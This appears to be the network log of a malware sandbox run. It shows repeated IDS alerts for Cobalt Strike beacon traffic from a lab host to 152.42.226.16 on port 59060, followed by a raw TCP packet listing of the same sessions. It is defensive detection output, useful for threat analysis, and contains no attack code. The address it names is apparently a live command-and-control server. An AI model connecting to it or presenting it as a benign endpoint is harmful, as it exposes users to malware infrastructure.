2024-12-26T19:28:07.008994+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49732 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:09.938290+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49733 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:13.024487+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49734 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:15.921977+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49735 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:18.852713+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49737 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:21.863365+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49741 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:24.767420+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49743 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:27.658629+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49745 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:30.587201+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49746 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:33.469999+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49747 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:36.381095+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49748 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:39.298766+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49749 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:42.220886+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49750 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:45.126842+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49751 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:48.127398+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49752 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:51.077524+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49753 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:53.995484+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49754 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:56.948292+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49755 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:59.893821+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49758 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:02.785028+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49764 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:05.752619+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49770 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:08.643492+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49776 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:11.534105+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49782 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:14.424353+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49788 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:17.315337+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49794 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:20.206541+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49805 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:23.112154+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49811 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:26.230193+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49817 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:29.189460+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49823 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:32.105461+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49829 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:35.046126+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49839 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:37.940700+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49846 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:40.833437+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49852 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:43.731451+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49858 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:46.671469+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49869 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:49.566010+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49875 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:52.473411+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49881 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:55.539263+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49887 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:29:58.426729+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49896 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:01.355750+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49904 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:04.261831+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49910 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:07.144332+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49916 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:10.036173+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49925 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:12.925060+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49933 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:16.035600+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49939 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:18.931747+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49945 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:21.832539+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49954 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:24.725469+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49962 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:27.613095+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49968 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:30.503531+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49973 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:33.410620+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49978 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:36.319540+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49987 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:39.298482+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49994 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:42.223934+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50000 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:45.113944+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50009 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:48.020191+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50016 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:50.913584+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50022 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:53.801887+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50029 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:56.737650+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50036 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:30:59.629939+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50045 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:31:02.519995+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50050 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:31:05.411871+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50056 | 152.42.226.16 | 59060 | TCP
                          2024-12-26T19:31:08.305535+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450063152.42.226.1659060TCP
                          2024-12-26T19:31:11.209608+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450067152.42.226.1659060TCP
                          2024-12-26T19:31:14.098124+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450068152.42.226.1659060TCP
                          2024-12-26T19:31:16.988917+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450069152.42.226.1659060TCP
                          2024-12-26T19:31:19.896222+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450070152.42.226.1659060TCP
                          2024-12-26T19:31:22.845151+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450071152.42.226.1659060TCP
                          2024-12-26T19:31:25.755345+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450072152.42.226.1659060TCP
                          2024-12-26T19:31:28.660857+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450073152.42.226.1659060TCP
                          2024-12-26T19:31:31.559825+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450074152.42.226.1659060TCP
                          2024-12-26T19:31:34.521650+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450075152.42.226.1659060TCP
                          2024-12-26T19:31:37.583462+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450076152.42.226.1659060TCP
                          2024-12-26T19:31:40.475090+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450077152.42.226.1659060TCP
                          2024-12-26T19:31:43.731887+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450078152.42.226.1659060TCP
                          2024-12-26T19:31:46.633605+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450079152.42.226.1659060TCP
                          2024-12-26T19:31:49.520544+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450080152.42.226.1659060TCP
                          2024-12-26T19:31:52.413722+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450081152.42.226.1659060TCP
                          2024-12-26T19:31:55.302479+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450082152.42.226.1659060TCP
                          2024-12-26T19:31:58.236196+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450083152.42.226.1659060TCP
                          2024-12-26T19:32:01.240049+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450084152.42.226.1659060TCP
                          2024-12-26T19:32:04.130504+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450085152.42.226.1659060TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 19:27:58.381906033 CET | 49730 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:27:58.501657009 CET | 59060 | 49730 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:27:58.501773119 CET | 49730 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:27:58.501960039 CET | 49730 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:27:58.621462107 CET | 59060 | 49730 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:01.173985004 CET | 59060 | 49730 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:01.174082041 CET | 49730 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:01.174201012 CET | 49730 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:01.284480095 CET | 49731 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:01.293832064 CET | 59060 | 49730 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:01.404340029 CET | 59060 | 49731 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:01.404429913 CET | 49731 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:01.404603958 CET | 49731 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:01.525646925 CET | 59060 | 49731 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:04.065500975 CET | 59060 | 49731 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:04.065607071 CET | 49731 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:04.065776110 CET | 49731 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:04.188317060 CET | 59060 | 49731 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:04.205208063 CET | 49732 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:04.324865103 CET | 59060 | 49732 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:04.324954987 CET | 49732 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:04.326299906 CET | 49732 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:04.445831060 CET | 59060 | 49732 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:07.008816957 CET | 59060 | 49732 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:07.008994102 CET | 49732 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:07.008994102 CET | 49732 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:07.125379086 CET | 49733 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:07.129863977 CET | 59060 | 49732 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:07.245503902 CET | 59060 | 49733 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:07.245574951 CET | 49733 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:07.245825052 CET | 49733 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:07.365350008 CET | 59060 | 49733 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:09.938190937 CET | 59060 | 49733 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:09.938290119 CET | 49733 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:09.938359022 CET | 49733 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:10.051434040 CET | 49734 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:10.057986975 CET | 59060 | 49733 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:10.171535015 CET | 59060 | 49734 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:10.171627045 CET | 49734 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:10.171814919 CET | 49734 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:10.292514086 CET | 59060 | 49734 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:13.024419069 CET | 59060 | 49734 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:13.024487019 CET | 49734 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:13.024561882 CET | 49734 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:13.128958941 CET | 49735 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:13.144754887 CET | 59060 | 49734 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:13.248680115 CET | 59060 | 49735 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:13.248749018 CET | 49735 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:13.248894930 CET | 49735 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:13.368614912 CET | 59060 | 49735 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:15.921891928 CET | 59060 | 49735 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:15.921977043 CET | 49735 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:15.922068119 CET | 49735 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:16.036178112 CET | 49737 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:16.042495966 CET | 59060 | 49735 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:16.155747890 CET | 59060 | 49737 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:16.155836105 CET | 49737 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:16.155977964 CET | 49737 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:16.275733948 CET | 59060 | 49737 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:18.852616072 CET | 59060 | 49737 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:18.852713108 CET | 49737 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:18.878941059 CET | 49737 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:18.990123987 CET | 49741 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:18.998482943 CET | 59060 | 49737 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:19.110018969 CET | 59060 | 49741 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:19.110097885 CET | 49741 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:19.110304117 CET | 49741 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:19.229834080 CET | 59060 | 49741 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:21.863044977 CET | 59060 | 49741 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:21.863364935 CET | 49741 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:21.863465071 CET | 49741 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:21.972388983 CET | 49743 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:21.982944965 CET | 59060 | 49741 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:22.092065096 CET | 59060 | 49743 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:22.092134953 CET | 49743 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:22.092303991 CET | 49743 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:22.211987019 CET | 59060 | 49743 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:24.767355919 CET | 59060 | 49743 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:24.767420053 CET | 49743 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:24.767528057 CET | 49743 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:24.880848885 CET | 49745 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:24.887006998 CET | 59060 | 49743 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:25.001029968 CET | 59060 | 49745 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:25.001147032 CET | 49745 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:25.001307964 CET | 49745 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:25.120786905 CET | 59060 | 49745 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:27.658510923 CET | 59060 | 49745 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:27.658628941 CET | 49745 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:27.658691883 CET | 49745 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:27.769164085 CET | 49746 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:27.778188944 CET | 59060 | 49745 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:27.888797998 CET | 59060 | 49746 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:27.888875961 CET | 49746 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:27.889086008 CET | 49746 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:28.009470940 CET | 59060 | 49746 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:30.587101936 CET | 59060 | 49746 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:30.587201118 CET | 49746 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:30.587260008 CET | 49746 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:30.690825939 CET | 49747 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:30.706803083 CET | 59060 | 49746 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:30.810405970 CET | 59060 | 49747 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:30.810489893 CET | 49747 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:30.810631990 CET | 49747 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:30.931967974 CET | 59060 | 49747 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:33.469933987 CET | 59060 | 49747 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:33.469999075 CET | 49747 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:33.470076084 CET | 49747 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:33.591033936 CET | 59060 | 49747 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:33.607059002 CET | 49748 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:33.726680994 CET | 59060 | 49748 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:33.726816893 CET | 49748 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:33.727039099 CET | 49748 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:33.846566916 CET | 59060 | 49748 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:36.380842924 CET | 59060 | 49748 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:36.381094933 CET | 49748 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:36.381165981 CET | 49748 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:36.489202976 CET | 49749 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:36.500874043 CET | 59060 | 49748 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:36.608969927 CET | 59060 | 49749 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:36.609054089 CET | 49749 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:36.613922119 CET | 49749 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:36.733736992 CET | 59060 | 49749 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:39.298552036 CET | 59060 | 49749 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:39.298765898 CET | 49749 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:39.298765898 CET | 49749 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:39.409729004 CET | 49750 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:39.419059992 CET | 59060 | 49749 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:39.532253981 CET | 59060 | 49750 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:39.532438040 CET | 49750 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:39.532476902 CET | 49750 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:39.652034044 CET | 59060 | 49750 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:42.220810890 CET | 59060 | 49750 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:42.220885992 CET | 49750 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:42.220958948 CET | 49750 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:42.333338976 CET | 49751 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:42.340542078 CET | 59060 | 49750 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:42.453094959 CET | 59060 | 49751 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:42.453190088 CET | 49751 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:42.453362942 CET | 49751 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:42.573633909 CET | 59060 | 49751 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:45.126789093 CET | 59060 | 49751 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:45.126842022 CET | 49751 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:45.126919031 CET | 49751 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:45.246484995 CET | 59060 | 49751 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:45.311599970 CET | 49752 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:45.431130886 CET | 59060 | 49752 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:45.431241035 CET | 49752 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:45.440135956 CET | 49752 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:45.561371088 CET | 59060 | 49752 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:48.127335072 CET | 59060 | 49752 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:48.127398014 CET | 49752 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:48.158183098 CET | 49752 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:48.273011923 CET | 49753 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:48.277904987 CET | 59060 | 49752 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:48.396697998 CET | 59060 | 49753 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:48.396774054 CET | 49753 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:48.397075891 CET | 49753 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:48.518801928 CET | 59060 | 49753 | 152.42.226.16 | 192.168.2.4
